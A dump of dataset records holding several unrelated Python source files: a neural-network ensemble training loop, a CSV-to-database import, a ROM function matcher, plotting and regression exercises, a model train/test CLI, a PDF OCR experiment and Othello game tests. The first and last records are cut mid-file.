res18.Network(cf.MODEL1_TES_CKPT_PATH, trainable=False, fine_tuning=False)\nnet_model1.build(images_model1, train_mode_model1)\n#model2, train\nnet_model2 = vgg16.Network(cf.MODEL2_TRA_CKPT_PATH, trainable=cf.MODEL2_TRAINABLE, fine_tuning=cf.MODEL2_FINE_TUNING)\nnet_model2.build(images_model2, train_mode_model2)\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=answers_model2, logits=net_model2.fc8_d1)\nloss = tf.reduce_mean(cross_entropy) \noptimizer = tf.train.AdamOptimizer(cf.LEARNING_RATE).minimize(loss)\n\n\ndt_model1 = data.Data(cf.TRA_IMG_PATH, cf.TRA_CSV, oversampling=False, batch_size = cf.BATCH_SIZE)\n\nsess.run(tf.global_variables_initializer())\n\n#restore weights\n\nvar_list1 = net_model1.build_tensors()\nvar_list2 = net_model2.build_tensors()\n\nloader1 = tf.train.Saver(var_list1)\nloader2 = tf.train.Saver(var_list2)\n\nloader1.restore(sess, cf.MODEL1_TES_CKPT_PATH)\nloader2.restore(sess, cf.MODEL2_TRA_CKPT_PATH)\n\n#mode set!, make new beg\nend = int(test_sz/cf.BATCH_SIZE) \n\nfor i in range(0, end):\n im_list, la_list, nm_list = dt_model1.get_batch()\n r1, r2 = sess.run([net_model1.prob, net_model1.fc8_d1], feed_dict={images_model1: im_list, train_mode_model1:False})\n l, clsnum = la_list.shape \n cnt = 0\n for j in range(0, l): #make batch for next model train, the \n #print(nm_list[j] + \", ans : \" + str(np.argmax(la_list[j])) +\", inference : \" + str(np.argmax(r1[j])))\n lab = np.argmax(la_list[j])\n inf = np.argmax(r1[j])\n if lab!=inf: #inference isn't correct => to batch. this may be changed for machine perfomance. (ex) thresh hold.\n for k in range(0, cf.BEG_WEIGHT-1):\n beg_pool_wr.writerow([nm_list[j], lab])\n else: #correct!\n if r1[j][inf] < cf.RANK1_THRESH_HOLD: #too small\n for k in range(0, cf.BEG_WEIGHT-1):\n beg_pool_wr.writerow([nm_list[j], lab])\n cnt = cnt+1\n print(str(i)+\" batch accuracy : \"+str(cnt/cf.BATCH_SIZE))\n\nf_beg_pool.close()\nprint(\"beg_pool is made completely!\")\n\n#set for beg making\nf_beg_pool = open('beg_pool.csv', 'r')\nbeg_pool_rdr = csv.reader(f_beg_pool)\nf_beg = open('beg.csv', 'w', newline='')\nf_beg_wr = csv.writer(f_beg)\n#start\nnum = test_sz\nname_list = []\nlabel_list = []\n\nfor line in beg_pool_rdr:\n name_list.append(line[0])\n label_list.append(int(line[1]))\nf_beg_pool.close()\n\nrand_idx = random.sample(range(len(label_list)), len(label_list))\nlimit = int(num*cf.BEG_RATIO)\ncnt = 0\nfor i in range(0, len(name_list)):\n if cnt == limit:\n break\n idx = rand_idx[i]\n label = int(label_list[idx])\n cnt = cnt + 1\n f_beg_wr.writerow([name_list[idx], label])\n\ndel name_list\ndel rand_idx\ndel dt_model1\ndel label_list \n\nf_beg.close()\nprint(\"beg is made completely!, and model2 start training!\")\ndt_model2 = data.Data(cf.TRA_IMG_PATH, 'beg.csv', oversampling=False, batch_size = cf.BATCH_SIZE)\ndt2_model2 = data.Data(cf.VAL_IMG_PATH, cf.VAL_CSV, oversampling=False, batch_size = cf.BATCH_SIZE)\nfor i in range(0, cf.ITER):\n if(i%cf.SAVE_ITER == 0)and(i!=0):\n print(\"trying to saving...\")\n net_model2.save_model(sess, i)\n im_list, la_list, nm_list = dt_model2.get_batch()\n r1, r2, r0= sess.run([optimizer, loss, net_model2.prob], feed_dict={images_model2: im_list, answers_model2: la_list, train_mode_model2:True})\n tra_cnt = 0\n for j in range(0, cf.BATCH_SIZE):\n inf = np.argmax(r0[j])\n lab = np.argmax(la_list[j])\n if inf == lab:\n tra_cnt = tra_cnt + 1\n im_list_val, la_list_val, name_list_val = dt2_model2.get_batch()\n vr0, vr1 = sess.run([net_model1.fc8_d1, net_model1.prob], 
feed_dict={images_model1: im_list_val, train_mode_model1:False})\n infer_list = [-1] * cf.BATCH_SIZE\n idx_list_next = []\n im_list_next = []\n batch_sz_next = 0\n cnt = 0\n for j in range(0, cf.BATCH_SIZE): #model 1 inference\n infer = np.argmax(vr1[j])\n if vr1[j][infer] < cf.RANK1_THRESH_HOLD:\n idx_list_next.append(j)\n im_list_next.append(im_list_val[j].reshape(1, 224, 224, 3))\n batch_sz_next = batch_sz_next + 1\n else:\n infer_list[j] = infer\n if batch_sz_next != 0: #model 2 in\n im_list_next = np.concatenate(im_list_next)\n print(im_list_next.shape)\n vr3, vr4 = sess.run([net_model2.prob, net_model2.fc8_d1], feed_dict={images_model2: im_list_next, train_mode_model2:False})\n for j in range(0, batch_sz_next):\n infer = np.argmax(vr3[j])\n infer_list[idx_list_next[j]] = np.argmax(vr3[j])\n for j in range(0, cf.BATCH_SIZE):\n ans = np.argmax(la_list_val[j])\n if ans==infer_list[j]:\n cnt = cnt+1\n acr = (cnt * 100) / cf.BATCH_SIZE\n print(\"iteration \"+ str(i)+\" => loss : \" + str(r2)+\", val accuraccy : \" +str(acr)+\", model2 tra accuracy : \"+str(tra_cnt*100/cf.BATCH_SIZE))\n log_wr.writerow([i, r2, acr, tra_cnt*100/cf.BATCH_SIZE])\n \nf_log.close()\n#remove all created additional file\n#os.remove('beg_pool.csv')\nos.remove('beg.csv')","sub_path":"diff_ensemble_train.py","file_name":"diff_ensemble_train.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319882489","text":"from sys import argv\nimport cs50\nimport csv\n\n## If incorect number of command_line arguments\nif len(argv) != 2:\n print(\"Missing command-line argument\")\n exit(1)\n\n## Connect to database\ndb = cs50.SQL(\"sqlite:///students.db\")\n\n## Open CSV file \nwith open(argv[1], \"r\") as characters_csv:\n \n ## Create DictReadeer\n students = csv.DictReader(characters_csv)\n \n ## Iterate over csv file\n for row in students:\n \n ## Split the name string into a list of names \n name = row[\"name\"].split()\n \n ## If character has middle name \n if len(name) == 3:\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (?, ?, ?, ?, ?)\", \n name[0], name[1], name[2], row[\"house\"], row[\"birth\"])\n \n ## If character has no middle name\n elif len(name) == 2:\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (?, ?, ?, ?, ?)\", \n name[0], None, name[1], row[\"house\"], row[\"birth\"])","sub_path":"XN/pset7/houses/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91125664","text":"#!/usr/bin/python3\nFOLDER_PATH = 'obj/'\nROM_PATH = '../rom.bin'\n\nimport sys\nsys.path.append('..')\nfrom parse_obj import parse_data\nimport os\n\nwith open(ROM_PATH, 'rb') as rom_file:\n\trom = rom_file.read()\n\na = set()\n\nfor file in os.listdir(os.fsencode(FOLDER_PATH)):\n\tfilename = os.fsdecode(file)\n\twith open(FOLDER_PATH + filename, 'rb') as obj_file:\n\t\tdata = parse_data(obj_file.read(), print = lambda x:0)\n\tfor obj_id, obj_name in data['nameof_export'].items():\n\t\tif 'fn' not in data['typeof_export'][obj_id]:\n\t\t\tcontinue\n\t\tfn_code = data[\"obj_data\"][obj_id]\n\t\tfn_len = len(fn_code)\n\n\t\tmatches = []\n\t\tfor i in range(0, len(rom)-fn_len, 2):\n\t\t\t'''\n\t\t\tTry matching 'rom[i:i+fn_len]' with fn_code.\n\t\t\tThe algorithm used here is not 100% accurate (it should\n\t\t\tonly match if the 00-00 comes after a 
L/ST/SB/TB/RB/\n\t\t\tLEA/B/BL) (see 'out.asm' for more details)\n\t\t\tbut hopefully it's accurate enough.\n\n\t\t\tThis is not the most efficient possible algorithm but\n\t\t\tit runs fast enough (48.5s on my machine).\n\t\t\t'''\n\t\t\tfor j in range(0, fn_len, 2):\n\t\t\t\tif not (\n\t\t\t\t\trom[i+j:i+j+2] == fn_code[j:j+2] or\n\t\t\t\t\tfn_code[j:j+2] == b'\\x00\\x00' or\n\t\t\t\t\t(\n\t\t\t\t\t\tj+2 != fn_len and\n\t\t\t\t\t\tfn_code[j+2:j+4] == b'\\x00\\x00' and\n\t\t\t\t\t\trom[i+j] == fn_code[j] and\n\t\t\t\t\t\t(rom[i+j+1]^fn_code[j+1])&0xf0 == 0\n\t\t\t\t\t)\n\t\t\t\t): break\n\t\t\telse: # cannot found any mismatch\n\t\t\t\tif matches:\n\t\t\t\t\t# multiple matches = bad\n\t\t\t\t\tmatches = []\n\t\t\t\t\tbreak\n\t\t\t\tmatches.append(i)\n\n\t\tif matches:\n\t\t\tprint(f'Fn {obj_name}, adr {hex(matches[0])[2:]}')\n","sub_path":"wine_tools/parse_all_obj.py","file_name":"parse_all_obj.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"207586563","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib.font_manager import FontManager\n\ncustom_font = mpl.font_manager.FontProperties(fname=r\"C:\\Windows\\Fonts\\simhei.ttf\", size=14)\nfont_size = 10\nfig_size = (8, 6)\nnames = (u'粒子群算法', u'人工蜂群算法')\nsubjects = (u'100', u'200', u'300')\nscores = ((26.2, 52.4, 79.4), (20.5, 46.8, 61.5))\nmpl.rcParams['font.size'] = font_size\nmpl.rcParams['figure.figsize'] = fig_size\nbar_width = 0.30\nindex = np.arange(len(scores[0]))\nrects1 = plt.bar(index, scores[0], bar_width, color='#0072BC', label=names[0])\nrects2 = plt.bar(index + bar_width, scores[1], bar_width, color='#ED1C24', label=names[1])\nplt.xticks(index + bar_width, subjects, fontProperties=custom_font)\nplt.ylim(ymax=100, ymin=0)\nplt.xlabel(u'任务数量', fontProperties=custom_font)\nplt.ylabel(u'任务执行时间', fontProperties=custom_font)\nplt.title(u'任务调度', fontProperties=custom_font)\nplt.legend(fancybox=True, prop=custom_font)\n\n\ndef add_labels(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width() / 2, height, height, ha='center', va='bottom')\n rect.set_edgecolor('white')\n\n\nadd_labels(rects1)\nadd_labels(rects2)\n\nplt.savefig('scores_par.png')\nplt.show()\n","sub_path":"two/Utils/learn3.py","file_name":"learn3.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"398398589","text":"\"\"\"\n``revscoring train_test -h``\n::\n\n Trains and tests a scorer model. 
This utility expects to get a file of\n tab-separated feature values and labels from which to construct a model.\n\n Usage:\n train_test -h | --help\n train_test [-p=]...\n [--version=]\n [--values-labels=]\n [--model-file=]\n [--label-type=]\n\n Options:\n -h --help Prints this documentation\n Classpath to an the MLScorerModel to construct\n and train\n Classpath to an list of features to use when\n constructing the model\n -p --parameter= A key-value argument pair to use when\n constructing the scorer_model.\n --version= A version to associate with the model\n --values-labels= Path to a file containing feature values and\n labels [default: ]\n --model-file= Path to write a model file to\n [default: ]\n --label-type= Interprets the labels as the appropriate type\n (int, float, str, bool) [default: str]\n\"\"\"\nimport json\nimport pprint\nimport random\nimport sys\n\nimport docopt\nfrom tabulate import tabulate\n\nfrom .util import encode, import_from_path\n\n\ndef main(argv=None):\n args = docopt.docopt(__doc__, argv=argv)\n\n ScorerModel = import_from_path(args[''])\n features = import_from_path(args[''])\n\n version = args['--version']\n\n model_kwargs = {}\n for parameter in args['--parameter']:\n key, value = parameter.split(\"=\")\n model_kwargs[key] = json.loads(value)\n\n scorer_model = ScorerModel(features, version=version, **model_kwargs)\n\n if args['--values-labels'] == \"\":\n values_labels_file = sys.stdin\n else:\n values_labels_file = open(args['--values-labels'], 'r')\n\n if args['--model-file'] == \"\":\n model_file = sys.stdout.buffer\n else:\n model_file = open(args['--model-file'], 'wb')\n\n decode_label = DECODERS[args['--label-type']]\n\n feature_labels = read_value_labels(values_labels_file,\n scorer_model.features,\n decode_label)\n\n run(feature_labels, model_file, scorer_model)\n\nDECODERS = {\n 'int': lambda v: int(v),\n 'float': lambda v: float(v),\n 'str': lambda v: str(v),\n 'bool': lambda v: v in (\"True\", \"true\", \"1\", \"T\", \"y\", \"Y\")\n}\n\ndef read_value_labels(f, features, decode_label):\n for line in f:\n parts = line.strip().split(\"\\t\")\n values = parts[:-1]\n label = parts[-1]\n\n label = decode_label(label)\n\n feature_values = []\n for feature, value in zip(features, values):\n\n if feature.returns == bool:\n feature_values.append(value == \"True\")\n else:\n feature_values.append(feature.returns(value))\n\n yield feature_values, label\n\ndef run(feature_labels, model_file, scorer_model):\n\n feature_labels = list(feature_labels)\n random.shuffle(feature_labels)\n\n test_set_size = int(0.6*len(feature_labels))\n test_set = feature_labels[:test_set_size]\n train_set = feature_labels[test_set_size:]\n\n scorer_model.train(train_set)\n\n stats = scorer_model.test(test_set)\n\n possible = list(set(actual for _, actual in stats['table'].keys()))\n possible.sort()\n\n sys.stderr.write(\"Accuracy: {0}\\n\\n\".format(stats['accuracy']))\n if 'auc' in stats['roc']:\n sys.stderr.write(\"ROC-AUC: {0}\\n\\n\".format(stats['roc']['auc']))\n else:\n sys.stderr.write(\"ROC-AUC:\\n\")\n\n\n table_data = [[comparison_label, stats['roc'][comparison_label]['auc']]\n for comparison_label in possible]\n sys.stderr.write(tabulate(table_data))\n sys.stderr.write(\"\\n\\n\")\n\n\n table_data = []\n\n for actual in possible:\n table_data.append([actual] +\n [stats['table'].get((predicted, actual), 0)\n for predicted in possible])\n sys.stderr.write(tabulate(table_data, headers=possible))\n sys.stderr.write(\"\\n\\n\")\n\n 
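    # Note on the split above: the first 60% of the shuffled examples end up
    # in test_set and only the remaining 40% are trained on. A conventional
    # hold-out keeps the larger share for training; with the same
    # shuffle-then-slice approach that variant would read:
    #
    #   train_size = int(0.6 * len(feature_labels))
    #   train_set = feature_labels[:train_size]
    #   test_set = feature_labels[train_size:]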
scorer_model.dump(model_file)\n","sub_path":"revscoring/utilities/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"608364176","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport os\nimport skimage\nimport numpy as np\nimport pytesseract\n\nfrom PIL import Image\nimport PIL.Image\nfrom PIL import Image\nfrom pytesseract import image_to_string\nimport pytesseract\nimport cv2\nimport os\nimport tempfile\nfrom pdf2image import convert_from_path\nimport imutils\n\n\n''' PART 1: CONVERT PDF TO IMAGE'''\n\ndatafile = \"27A01-30006-21_F6137-3\"\nsave_dir = '/home/greggas/Downloads/SatAir/'\nfilename = save_dir + datafile + \".pdf\"\n\nwith tempfile.TemporaryDirectory() as path:\n images_from_path = convert_from_path(filename, output_folder=path, last_page=1, first_page=0)\n\nbase_filename = os.path.splitext(os.path.basename(filename))[0] + '.jpg'\n\n\n\n\nfor page in images_from_path:\n page.save(os.path.join(save_dir, base_filename), 'JPEG')\n\n\n\n\n\n'''PART 2: CORRECT ORIENTATION OF IMAGE'''\n# convert the image to grayscale and flip the foreground\n# and background to ensure foreground is now \"white\" and\n# the background is \"black\"\nfilename = save_dir + datafile + \".jpg\"\nimage = cv2.imread(filename)\nscale_percent = 40 # percent of original size\nwidth = int(image.shape[1] * scale_percent / 100)\nheight = int(image.shape[0] * scale_percent / 100)\ndim = (width, height)\n# resize image\nimage = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\nblur = cv2.blur(image,(5,5))\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray',gray)\n#gray = cv2.bitwise_not(gray)\n'''\nh,w, d = image.shape\nimage2 = cv2.CreateMat(h, w, cv2.CV_32FC3)\nimage = cv2.fromarray(image2)\ncv2.CvtColor(image, image, cv2.CV_GRAY2BGR)\n'''\n#image = cv2.fromarray(image)\n# threshold the image, setting all foreground pixels to\n# 255 and all background pixels to 0\n#thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n\n#print(type(image))\nedges = cv2.Canny(gray,50,100,apertureSize = 3)\nkernel = np.ones((2,2),np.uint8)\ndilation = cv2.dilate(edges,kernel,iterations = 2)\ncv2.imshow('edges',edges)\nminLineLength = 3000\nmaxLineGap = 100\nimgCopy = image.copy()\nlines = cv2.HoughLinesP(edges,1,np.pi/180,100,minLineLength,maxLineGap)\n#print(lines)\nfor l in lines:\n cv2.line(image,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,255,0),2)\n\ncv2.imshow('houghlines',image)\n\n\n# load the image and define the window width and height\n\n(winW, winH) = (300, 60)\n\n# loop over the image pyramid\nwordToSearch = \"Harmonised\"\nfor resized in pyramid(image, scale=1.5):\n\t# loop over the sliding window for each layer of the pyramid\n\n for (x, y, window) in sliding_window(resized, stepSize=50, windowSize=(winW, winH)):\n\n # if the window does not meet our desired window size, ignore it\n if window.shape[0] != winH or window.shape[1] != winW:\n continue\n #startTime = time.time()\n # THIS IS WHERE YOU WOULD PROCESS YOUR WINDOW, SUCH AS APPLYING A\n # MACHINE LEARNING CLASSIFIER TO CLASSIFY THE CONTENTS OF THE\n # WINDOW\n\n # since we do not have a classifier, we'll just draw the window\n clone = resized.copy()\n crop_img = clone[y:y + winH, x:x + winW]\n ret, crop_img = cv2.threshold(crop_img,127,255,cv2.THRESH_BINARY)\n kernel = np.ones((1, 1), np.uint8)\n crop_img = cv2.dilate(crop_img, kernel, iterations=2)\n #crop_img = 
cv2.threshold(crop_img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n cv2.imshow(\"cropped\", crop_img)\n cv2.rectangle(clone, (x, y), (x + winW, y + winH), (0, 255, 0), 2)\n output = image_to_string(crop_img, lang='eng')\n print(output)\n if wordToSearch in output:\n print(\"Searched string found!! Output = \", output, \"wordToSearch = \", wordToSearch)\n #endTime = time.time()\n #print(\"Time taken = \", endTime - startTime)\n\n cv2.imshow(\"Window\", clone)\n cv2.waitKey(100)\n #time.sleep(0.00001)\n\n# Display Results\n#imgCopy = cv2.imread(\"/home/greggas/PycharmProjects/Personal/venv/lib/python3.5/site-packages/pytesseract/test.png\")\ncv2.imshow('imgCopy',imgCopy)\n# output = image_to_string(imgCopy, lang='eng')\n# print(output)\ncv2.waitKey()\n\n\n\n'''\nkernel = np.ones((1,1),np.uint8)\nerosion = cv2.erode(thresh,kernel,iterations = 1)\n\ncv2.imshow(\"erosion\", erosion)\ncv2.imshow(\"thresh\", thresh)\n# grab the (x, y) coordinates of all pixel values that\n# are greater than zero, then use these coordinates to\n# compute a rotated bounding box that contains all\n# coordinates\n\n\n# convert the resized image to grayscale, blur it slightly,\n# and threshold it\n\n\n\ngray = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\n# find contours in the thresholded image and initialize the\n# shape detector\ncontours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(contours)\nmax = 150\nmin = 15\nprint(\"len(contours) = \", len(contours))\nfor c in contours:\n area = cv2.contourArea(c)\n\n if(area < max and area > min):\n print(\"\\nContour is : \", c)\n print(\"Area = \", area)\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n\t# compute the center of the contour, then detect the name of the\n\t# shape using only the contour\n\n\n\ncv2.imshow(\"Image\", image)\ncv2.waitKey()\n\n\n\n\n\ncoords = np.column_stack(np.where(thresh > 0))\nangle = cv2.minAreaRect(coords)[-1]\n\n# the `cv2.minAreaRect` function returns values in the\n# range [-90, 0); as the rectangle rotates clockwise the\n# returned angle trends to 0 -- in this special case we\n# need to add 90 degrees to the angle\nif angle < -45:\n angle = -(90 + angle)\n\n# otherwise, just take the inverse of the angle to make\n# it positive\nelse:\n angle = -angle\n\n# rotate the image to deskew it\n(h, w) = image.shape[:2]\ncenter = (w // 2, h // 2)\nM = cv2.getRotationMatrix2D(center, angle, 1.0)\nrotated = cv2.warpAffine(image, M, (w, h),\n flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n\n\n# draw the correction angle on the image so we can validate it\ncv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle),\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n# show the output image\nprint(\"[INFO] angle: {:.3f}\".format(angle))\ncv2.imshow(\"Input\", image)\ncv2.imshow(\"Rotated\", rotated)\ncv2.waitKey()\n\n'''\n# Loop over Image and Segment\n'''\nyDirectionPercent = 0.02\nyDirectionStep = int(yDirectionPercent * imgCopy.shape[0])\nxDirectionPercent = 0.02\nxDirectionStep = int(xDirectionPercent * imgCopy.shape[1])\nwindowSize = [0.05*imgCopy.shape[1],0.05*imgCopy.shape[0]]\nprint(imgCopy.shape)\nfor y in range(0, imgCopy.shape[0], yDirectionStep):\n for x in range(0, imgCopy.shape[1], xDirectionStep):\n startX = x\n endX = x + windowSize[0]\n startY = y\n endY = y + windowSize[1]\n if window.shape[0] != winH or window.shape[1] != 
winW:\n continue\n subWindow = sliding_window(imgCopy,xDirectionStep, windowSize)\n print((subWindow))\n cv2.imshow('subWindow', subWindow)\n cv2.waitKey()\n'''\n\n'''\n# Helper Functions\ndef slidingWindow(x,y,img,windowsize):\n yield (x, y, img[y:y + windowSize[1], x:x + windowSize[0]])\n'''\n#pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract'\n#TESSDATA_PREFIX = 'C:/Program Files (x86)/Tesseract-OCR'\n#pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract'\n#TESSDATA_PREFIX = 'C:/Program Files (x86)/Tesseract-OCR'\n\n#imgCopy = cv2.imread(\"/home/greggas/PycharmProjects/Personal/venv/lib/python3.5/site-packages/pytesseract/test.png\")\ncv2.imshow('imgCopy',imgCopy)\noutput = image_to_string(imgCopy, lang='eng')\nprint(output)\ncv2.waitKey()","sub_path":"PDF_Reader/PDF_test.py","file_name":"PDF_test.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370504076","text":"import numpy as np\nfrom featureNormalize import normal\nimport matplotlib.pyplot as plt\nimport scipy.optimize as op\nfrom computeCost import computeCost\nfrom gradientDescent import gradientDescent,costFunction,gradient\nfrom normalEqn import normalEql\nplt.rcParams['font.sans-serif']=['SimHei']\nplt.rcParams['axes.unicode_minus']=False\ndataset = np.loadtxt('ex1data2.txt', delimiter=',', usecols=(0,1,2))\nX1=dataset[:,0:2]\nY1=dataset[:,2:]\ntheta1=np.zeros((3,1))\nX,xmean,xstd,Y,ymean,ystd=normal(X1,Y1)\nY=Y.reshape((Y.size,1))\nX=np.hstack((np.ones((len(X),1)),X))\nalpha=0.05\niters=300\ntheta,J_history=gradientDescent(X,Y,theta1,alpha,iters)\nJ_history2=gradientDescent(X,Y,theta1,0.01,iters)[1]\nJ_history3=gradientDescent(X,Y,theta1,0.1,iters)[1]\nJ_history4=gradientDescent(X,Y,theta1,0.3,iters)[1]\nplt.figure()\n#损失值与迭代次数关系图\na = np.array(np.arange(1, iters+1).reshape(300,1))\nplt.title('梯度下降')\nplt.plot(a, J_history, 'r-')\nplt.plot(a, J_history2, 'b-')\nplt.plot(a, J_history3, 'k-')\nplt.plot(a, J_history4, 'y-')\nplt.xlim(1,50)\nplt.ylabel('损失值')\nplt.xlabel('迭代次数')\nplt.grid(linestyle=':',color='r')\n\nx=np.array([[1,(1650-xmean[0])/xstd[0],(3-xmean[1])/xstd[1]]])\nprint(theta)\nprint(((x@theta)[0,0])*ystd+ymean)\n\nX1=np.hstack((np.ones((len(X1),1)),X1))\ntheta2=normalEql(X1,Y1)\nx2=np.array([[1,1650,3]])\nprint(x2@theta2)\n\ntheta=np.zeros(3)\nresult=op.minimize(fun=costFunction,x0=theta.reshape(3,),args=(X,Y),jac=gradient,method='TNC',options={'maxiter':400})\ntheta=(result.x).reshape(len(result.x),1)\nprint(((x@theta)[0,0])*ystd+ymean)\n\n# plt.show()\n","sub_path":"line_regression/multi_ex1.py","file_name":"multi_ex1.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"67507806","text":"from game_manager import GameManager\nfrom game_controller import GameController\nfrom board import Board\n\n\ndef test_constructor():\n '''Test initialization of GameController\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n assert gm.player_turn\n assert gm.board == bd\n assert gm.print_turn\n assert gm.prompt_name\n\n\ndef test_is_legal_move():\n '''Test is_legal_move method to make sure legal and non-legal moves\n are handeled correctly.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n 
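    # For reference, the direction-scan rule these assertions exercise,
    # written over a plain 2D grid (a generic sketch -- it does not use the
    # project's Board/Tile API):
    def _captures(grid, row, col, me, opp):
        """Return the opponent cells captured by playing (row, col)."""
        captured = []
        for dr, dc in [(-1, -1), (-1, 0), (-1, 1), (0, -1),
                       (0, 1), (1, -1), (1, 0), (1, 1)]:
            run, r, c = [], row + dr, col + dc
            # walk along a run of opponent disks...
            while 0 <= r < len(grid) and 0 <= c < len(grid[0]) \
                    and grid[r][c] == opp:
                run.append([r, c])
                r, c = r + dr, c + dc
            # ...and keep it only if one of our own disks closes the run
            if run and 0 <= r < len(grid) and 0 <= c < len(grid[0]) \
                    and grid[r][c] == me:
                captured.extend(run)
        return captured  # an empty list means the move is not legal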
bd.tile.starting_four_tiles()\n assert not gm.is_legal_move(0, 0)\n assert gm.is_legal_move(0, 1) == [[1, 1]]\n assert gm.is_legal_move(1, 0) == [[1, 1]]\n gm.player_turn = False\n assert not gm.is_legal_move(1, 1)\n assert gm.is_legal_move(2, 0) == [[2, 1]]\n assert gm.is_legal_move(3, 1) == [[2, 1]]\n assert gm.is_legal_move(0, 2) == [[1, 2]]\n assert gm.is_legal_move(1, 3) == [[1, 2]]\n\n\ndef test_real_space():\n '''Test real_space method to make sure spaces that are off\n the board are not counted as real spaces.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n assert gm.real_space(1, 2)\n assert not gm.real_space(4, 2)\n assert gm.real_space(0, 0)\n assert not gm.real_space(-1, 0)\n\n\ndef test_flip_tiles():\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n gm.flip_tiles([[1, 1], [0, 1]], 0)\n assert bd.disks[1][1].fill_color == 'black'\n assert bd.disks[0][1].fill_color == 'black'\n assert bd.disks[0][0].fill_color == 'green'\n\n\ndef test_ai_move_decision():\n '''Test if the computer makes the correct deicion for\n certain tile situations on board.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Change space (2, 2) to black and (2, 3) to white.\n # Now best move should be space (2, 0)\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(2, 3, 255)\n gm.player_turn = False\n assert gm.ai_move_decision() == (2, 0)\n bd.tile.change_color(2, 0, 0)\n bd.tile.change_color(0, 2, 255)\n assert gm.ai_move_decision() == (3, 2)\n # Change all tiles to black so there are no legal moves.\n # method should return False\n bd.tile.change_color(1, 1, 0)\n bd.tile.change_color(0, 2, 0)\n bd.tile.change_color(2, 3, 0)\n assert not gm.ai_move_decision()\n\n\ndef test_player_make_move():\n '''Test that the player move is legal and the game is not\n over\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Check that a legal move causes player turn to change to False\n # and the correct tiles are on the board\n gm.player_turn = True\n gm.player_make_move(100, 0)\n assert bd.disks[1][0].fill_color == 'black'\n assert bd.disks[1][1].fill_color == 'black'\n assert not gm.player_turn\n assert gm.print_turn\n # Test that if move is not legal, nothing changes\n gm.player_turn = True\n gm.player_make_move(0, 0)\n assert gm.player_turn\n assert bd.disks[0][0].fill_color == 'green'\n # Test what happens when there are no more legal moves for player\n # but still legal moves for computer\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(1, 3, 255)\n gm.player_make_move(0, 0)\n assert not gm.player_turn\n assert gm.print_turn\n assert not bd.end_game\n # Test when neither ai nor player has a move left\n gm.player_turn = True\n bd.tile.change_color(1, 3, 0)\n gm.player_make_move(0, 0)\n assert bd.end_game\n\n\ndef test_ai_make_move():\n '''Test ai_make_move method to make sure the move is\n being made and that game ends when appropriate \n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n # Check ai makes the right move when able\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(2, 3, 255)\n 
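    # The choices asserted in test_ai_move_decision above are consistent
    # with a greedy rule -- take the legal square that flips the most disks.
    # A generic sketch of that rule (legal_moves is a hypothetical
    # {square: flipped_cells} mapping, not part of GameManager):
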